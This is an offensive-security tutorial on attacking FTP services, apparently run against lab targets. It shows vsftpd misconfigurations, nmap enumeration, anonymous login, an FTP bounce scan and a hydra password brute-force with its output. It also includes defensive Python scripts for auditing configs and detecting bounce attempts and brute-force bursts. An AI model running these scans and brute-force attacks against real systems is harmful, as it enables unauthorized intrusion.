ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting FTP

This entry is part 3 of 3 in the series Offensive Testing Enterprise Networks


By default, the FTP service listens on TCP port 21. However, an administrator can change this and run the service on any other TCP port (the brute-force example at the end of this post targets port 2121), so do not assume port 21 is the only place to look.

Basic FTP Commands

Command                    Description
?/help                     Print local help information
append                     Append to a file
ascii                      Set ASCII transfer type
binary                     Set binary transfer type
bye/exit/quit              Terminate the ftp session and exit
cd                         Change remote working directory
chmod                      Change file permissions of a remote file
close/disconnect           Terminate the FTP session
debug                      Toggle/set debugging mode
delete/mdelete (multiple)  Delete remote file(s)
dir/ls                     List contents of remote directory
get/recv/mget (multiple)   Receive file(s)
mkdir                      Make directory on remote machine
passive                    Enter passive transfer mode
put/mput (multiple)        Send file(s)
pwd                        Print working directory on remote machine
rename                     Rename file
rmdir                      Remove directory on remote machine
size                       Show size of remote file
type                       Set file transfer type
verbose                    Toggle verbose mode

Vulnerable FTP Settings

There are many security-related settings on an FTP server. The settings below are vsFTPd configuration directives (vsftpd.conf); each one, when set as shown, widens what an anonymous user is allowed to do.

Setting                       Description
anonymous_enable=YES          Allow anonymous login
anon_upload_enable=YES        Allow anonymous users to upload files
anon_mkdir_write_enable=YES   Allow anonymous users to create new directories
no_anon_password=YES          Do not ask anonymous users for a password
anon_root=/home/username/ftp  Directory that anonymous users land in
write_enable=YES              Allow the write commands STOR, DELE, RNFR, RNTO, MKD, RMD, APPE and SITE
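As an added example (not part of the original post), the following Python audit script reads a vsftpd.conf-style file and reports which of the directives from the table above are set to YES. The two configuration strings are constructed for the example; the treatment of a missing key as "not enabled" is an assumption of this script, and the daemon's own compiled-in defaults may differ.

```python
"""Audit a vsftpd-style configuration for the anonymous-access directives listed above."""
from __future__ import annotations

# Directives from the table above whose YES value widens anonymous access, with the reason each matters.
RISKY_IF_YES = {
    "anonymous_enable": "anonymous login allowed",
    "anon_upload_enable": "anonymous users may upload files",
    "anon_mkdir_write_enable": "anonymous users may create directories",
    "no_anon_password": "anonymous login without a password prompt",
    "write_enable": "write commands (STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, SITE) enabled",
}

# Constructed sample configurations (not taken from any real server).
SAMPLE_CONF = """\
# constructed sample vsftpd.conf
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
no_anon_password=YES
anon_root=/srv/ftp
write_enable=YES
local_enable=NO
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
"""


def parse_vsftpd_conf(text: str) -> dict[str, str]:
    """Parse key=value lines; blank lines and '#' comments are ignored, as vsftpd does."""
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # comment, blank, or malformed line (vsftpd rejects the latter at startup)
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit(settings: dict[str, str]) -> list[str]:
    """Return one finding per risky directive set to YES, plus one for the anonymous-write combination."""
    # Assumption: an absent key is treated as NO here; the daemon's built-in defaults may differ.
    enabled = {k for k in RISKY_IF_YES if settings.get(k, "NO").upper() == "YES"}
    findings = [f"{key}=YES: {reason}" for key, reason in RISKY_IF_YES.items() if key in enabled]
    # Anonymous uploads need all three of these; flag the combination explicitly because it is the worst case.
    if {"anonymous_enable", "write_enable", "anon_upload_enable"} <= enabled:
        findings.append("anonymous users can write to the server "
                        "(anonymous_enable + write_enable + anon_upload_enable)")
    return findings


def audit_config(text: str) -> list[str]:
    """Convenience wrapper: parse then audit."""
    return audit(parse_vsftpd_conf(text))


if __name__ == "__main__":
    for name, conf in (("sample", SAMPLE_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_config(conf) or ["no risky directives set"]:
            print("  -", finding)
```

Run the file directly to see the sample configuration produce six findings and the hardened one none; point `audit_config` at the contents of a real vsftpd.conf to audit a server.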

Enumeration

Nmap – FTP Scripts

In Kali Linux, all the NSE scripts are located in the folder /usr/share/nmap/scripts/.

Finding the FTP-related nmap scripts:

#Update nmap scripts
C:\home\zybersec> sudo nmap --script-updatedb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 13:29 CEST
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.77 seconds
                                                                
#find nmap scripts for ftp service
C:\home\zybersec> find / -type f -name ftp* 2>/dev/null | grep scripts
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-libopie.nse                                          

The Nmap default script set (-sC) includes the ftp-anon script, which checks whether an FTP server allows anonymous logins. The version detection flag (-sV) provides useful information about the FTP service, such as the banner, which often includes the product name and version.

FTP – nmap enumeration 01
# nmap enumeration 
C:\home\zybersec> sudo nmap -sC -sV -p 21 192.168.152.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:57 CEST
Nmap scan report for 192.168.152.133
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.152.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 00:0C:29:76:48:04 (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.09 seconds
FTP – nmap enumeration 02
sudo nmap -sC -sV -A -T4 -p 21 10.129.103.157
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:39 BST
Nmap scan report for 10.129.103.157
Host is up (0.0027s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 InFreight FTP v1.1
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.93%I=7%D=4/27%Time=644A5EF7%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,74,"220\x20InFreight\x20FTP\x20v1\.1\r\n500\x20Invalid\x20comm
SF:and:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   2.60 ms 10.10.14.1
2   2.56 ms 10.129.103.157

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.99 seconds

Anonymous Login

One of the authentication mechanisms FTP offers is the anonymous user. It is often used to let everyone on an internal network share files and data without accessing each other's computers.

From the nmap scan, it seems that anonymous login is accepted by the target FTP server. To log in anonymously, we use the username anonymous with an empty password (this server asks for an e-mail address as the password, but accepts an empty one):

# anonymous login
└──╼ $ftp 10.129.103.157
Connected to 10.129.103.157.
220 InFreight FTP v1.1
Name (10.129.103.157:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
226 Transfer complete
ftp> 
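As an added example (not code from the original post), here is a small Python parser for the server side of an FTP control-channel exchange like the one above. It folds RFC 959 multi-line replies (a `NNN-` first line closed by a `NNN ` line, as the STAT output in the nmap scan uses) into single replies and reports whether the login was granted. The transcript is constructed for the example, modelled on the session and the nmap ftp-syst output shown above.

```python
"""Parse FTP server reply lines (RFC 959) and classify the login outcome."""
from __future__ import annotations

# Constructed transcript of server replies only (client commands omitted), modelled on the session above.
SAMPLE_TRANSCRIPT = """\
220 InFreight FTP v1.1
331 Anonymous login ok, send your complete email address as your password
230 Anonymous access granted, restrictions apply
211-FTP server status:
     Connected to 10.10.14.5
     Logged in as ftp
211 End of status
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
"""

DENIED_TRANSCRIPT = """\
220 (vsFTPd 3.0.3)
331 Please specify the password.
530 Login incorrect.
"""


def parse_replies(transcript: str) -> list[tuple[int, str]]:
    """Return a list of (code, text) replies; multi-line replies are joined into one text."""
    lines = transcript.splitlines()
    replies: list[tuple[int, str]] = []
    i = 0
    while i < len(lines):
        line = lines[i]
        # Every reply starts with a three-digit code followed by a space (single line) or '-' (multi-line).
        if len(line) < 4 or not line[:3].isdigit() or line[3] not in " -":
            raise ValueError(f"not an FTP reply line: {line!r}")
        code = int(line[:3])
        if line[3] == "-":
            text = [line[4:]]
            i += 1
            # Continuation lines run until a line that starts with the same code and a space.
            while i < len(lines) and not lines[i].startswith(f"{code} "):
                text.append(lines[i].strip())
                i += 1
            if i == len(lines):
                raise ValueError(f"unterminated multi-line reply {code}")
            text.append(lines[i][4:])
            replies.append((code, "\n".join(text)))
        else:
            replies.append((code, line[4:]))
        i += 1
    return replies


def login_outcome(replies: list[tuple[int, str]]) -> str:
    """'granted' on a 230 reply, 'denied' on a 530 reply, otherwise 'unknown'."""
    for code, _ in replies:
        if code == 230:
            return "granted"
        if code == 530:
            return "denied"
    return "unknown"


if __name__ == "__main__":
    for code, text in parse_replies(SAMPLE_TRANSCRIPT):
        print(code, text.splitlines()[0])
    print("login:", login_outcome(parse_replies(SAMPLE_TRANSCRIPT)))
```

The same parser can be run over a saved `nc`/`telnet` session or a control-channel capture to confirm, from the reply codes alone, whether a server granted an anonymous login.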

FTP login using Openssl

It looks slightly different if the FTP server runs with TLS/SSL encryption, because then we need a client that can handle TLS/SSL. For this, we can use the openssl client to talk to the FTP server. A benefit of using openssl is that we also see the server's certificate (here self-signed, as the verify error shows), whose subject fields can reveal hostnames and organisation details.

Connect using openssl
# FTP server runs with TLS/SSL encryption
openssl s_client -connect 192.168.152.133:21 -starttls ftp

CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify return:1
---
Certificate chain
 0 s:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
   i:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIENTCCAx2gAwIBAgIUD+SlFZAWzX5yLs2q3ZcfdsRQqMYwDQYJKoZIhvcNAQEL
...SNIP...

Service Interaction

# Interacting with the FTP service directly (banner grabbing)
C:\home\zybersec> nc -nv 192.168.152.133 21
(UNKNOWN) [192.168.152.133] 21 (ftp) open
220 (vsFTPd 2.3.4)

C:\home\zybersec> telnet 192.168.152.133 21
Trying 192.168.152.133...
Connected to 192.168.152.133.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

# Enumerate FTP: server-side configuration (requires a shell on the FTP server)
grep -v "#" /etc/vsftpd.conf   # active (non-comment) settings
cat /etc/ftpusers              # users denied FTP login

# Enumerate FTP: inside an ftp> session
ftp> status
ftp> ls
ftp> cd <directory>
ftp> ls -R                     # recursive listing
ftp> get path/to/file.txt      # download a single file
ftp> ls | grep files.txt

# Mirror all available files from the local shell (active mode)
wget -m --no-passive ftp://anonymous:[email protected]

# Test whether uploads are permitted
touch testupload.txt           # create a file locally
ftp> put testupload.txt        # upload it

FTP Bounce Attacks

An FTP bounce attack is a network attack that abuses an FTP server to deliver outbound traffic to another device on the network. The attacker sends a PORT command naming a third host, so that the FTP server opens its data connection to that host instead of back to the client, and uses the server's responses to learn about a device other than the intended server.

Consider we are targeting an FTP server, FTP_DMZ, exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ via the FTP bounce attack and obtain information about that server's open ports. Then, we can use that information as part of our attack against the infrastructure.

Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured in modern-day FTP servers, the server can become vulnerable to an FTP Bounce attack.
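As an added example (not part of the original post), the following Python code shows what the PORT command carries and the check a server needs in order to refuse a bounce: the address in the PORT argument must match the peer of the control connection, and the data port should not be a privileged port. The client addresses and PORT arguments below are constructed for the example; the two-rule policy is an illustration, not a specific server's implementation.

```python
"""Decode/encode the RFC 959 PORT argument and check it against the control-connection peer."""
from __future__ import annotations

import ipaddress


def parse_port_argument(arg: str) -> tuple[str, int]:
    """'h1,h2,h3,h4,p1,p2' -> ('h1.h2.h3.h4', p1*256 + p2)."""
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated decimal fields")
    nums = [int(p) for p in parts]
    if any(not 0 <= n <= 255 for n in nums):
        raise ValueError("each PORT field must be in the range 0-255")
    host = ".".join(str(n) for n in nums[:4])
    ipaddress.IPv4Address(host)  # raises if the four octets do not form a valid address
    port = nums[4] * 256 + nums[5]
    if port == 0:
        raise ValueError("port 0 is not a valid data port")
    return host, port


def encode_port_argument(host: str, port: int) -> str:
    """Inverse of parse_port_argument: build the argument a client would send."""
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    octets = str(ipaddress.IPv4Address(host)).split(".")
    return ",".join(octets + [str(port // 256), str(port % 256)])


def check_port_command(client_ip: str, arg: str) -> list[str]:
    """Return the reasons a server should reject this PORT from client_ip; an empty list means accept.

    Rule 1 is the bounce defence itself: the data connection may only go back to the client that
    opened the control connection. Rule 2 blocks the classic use of a bounce to reach low ports.
    """
    host, port = parse_port_argument(arg)
    problems = []
    if ipaddress.ip_address(host) != ipaddress.ip_address(client_ip):
        problems.append(f"PORT address {host} differs from control-connection peer {client_ip} "
                        "(possible bounce attempt)")
    if port < 1024:
        problems.append(f"data port {port} is a privileged port")
    return problems


if __name__ == "__main__":
    # Constructed addresses: a client at 10.10.14.5 and an internal host 172.17.0.2 behind the server.
    client = "10.10.14.5"
    for arg in (encode_port_argument(client, 50000), "172,17,0,2,0,80"):
        verdict = check_port_command(client, arg) or ["accept"]
        print(f"PORT {arg}: {'; '.join(verdict)}")
```

In vsFTPd this is the behaviour behind the `port_promiscuous` directive: with its default of NO the server enforces rule 1, and only an administrator turning it on reopens the bounce path.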

# FTP Bounce attack
nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE  SERVICE
80/tcp open http

<SNIP>

Brute Force FTP

# HYDRA brute-force attack: -l single username, -P password list, -s non-default port, -f stop after the first valid pair
hydra -f -l robin -P passwords.txt 10.129.1.122 ftp -s 2121
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 10:28:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking ftp://10.129.1.122:2121/
[2121][ftp] host: 10.129.1.122   login: robin   password: 7ixxxxxxxxxxx
[STATUS] attack finished for 10.129.1.122 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-28 10:28:47
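An attack like the hydra run above is loud on the server side: hundreds of failed logins from one client in under a minute, followed by a success. As an added example (not part of the original post), this Python detector runs a sliding-window count of failed logins per client address over vsftpd-style log lines and raises a second alert when a flagged client then logs in successfully. The log lines are constructed for the example and follow the `[user] FAIL LOGIN: Client "ip"` / `OK LOGIN` layout of vsftpd's own log; the threshold of five failures in 60 seconds is an assumed tuning value.

```python
"""Detect FTP password-guessing bursts in vsftpd-style log lines."""
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log excerpt (not from a real server), in the layout vsftpd writes to vsftpd.log.
SAMPLE_LOG = """\
Fri Apr 28 10:28:01 2023 [pid 1201] [robin] FAIL LOGIN: Client "10.10.14.5"
Fri Apr 28 10:28:02 2023 [pid 1202] [robin] FAIL LOGIN: Client "10.10.14.5"
Fri Apr 28 10:28:02 2023 [pid 1203] [robin] FAIL LOGIN: Client "10.10.14.5"
Fri Apr 28 10:28:03 2023 [pid 1204] [bob] FAIL LOGIN: Client "10.10.14.9"
Fri Apr 28 10:28:03 2023 [pid 1205] [robin] FAIL LOGIN: Client "10.10.14.5"
Fri Apr 28 10:28:04 2023 [pid 1206] [robin] FAIL LOGIN: Client "::ffff:10.10.14.5"
Fri Apr 28 10:28:05 2023 [pid 1207] [anonymous] OK LOGIN: Client "10.10.14.9", anon password "test@example.com"
Fri Apr 28 10:28:47 2023 [pid 1250] [robin] OK LOGIN: Client "10.10.14.5"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line: str) -> tuple[datetime, str, str, str] | None:
    """Return (timestamp, user, result, client_ip) for a login line, or None for anything else."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(re.sub(r" +", " ", m["ts"]), "%a %b %d %H:%M:%S %Y")
    # vsftpd logs IPv4 clients on a dual-stack socket as ::ffff:a.b.c.d; normalise so both forms count together.
    ip = m["ip"].removeprefix("::ffff:")
    return ts, m["user"], m["result"], ip


def detect_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(seconds=60)) -> list[str]:
    """Alert once per client that reaches `threshold` failures inside `window`, and again if it then succeeds."""
    failures: dict[str, deque[datetime]] = defaultdict(deque)
    flagged: set[str] = set()
    alerts: list[str] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, result, ip = parsed
        if result == "FAIL":
            recent = failures[ip]
            recent.append(ts)
            while recent and ts - recent[0] > window:  # drop failures that fell out of the window
                recent.popleft()
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(f"{ts:%H:%M:%S} {ip}: {len(recent)} failed logins within "
                              f"{int(window.total_seconds())}s (last user tried: {user})")
        elif ip in flagged:  # OK LOGIN from a client already flagged: the guess probably succeeded
            alerts.append(f"{ts:%H:%M:%S} {ip}: successful login as {user} after a failure burst")
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

Feed the function a live tail of vsftpd.log instead of the sample to use it as a lightweight detector; the single failure from the second client never reaches the threshold, so only the guessing client produces alerts.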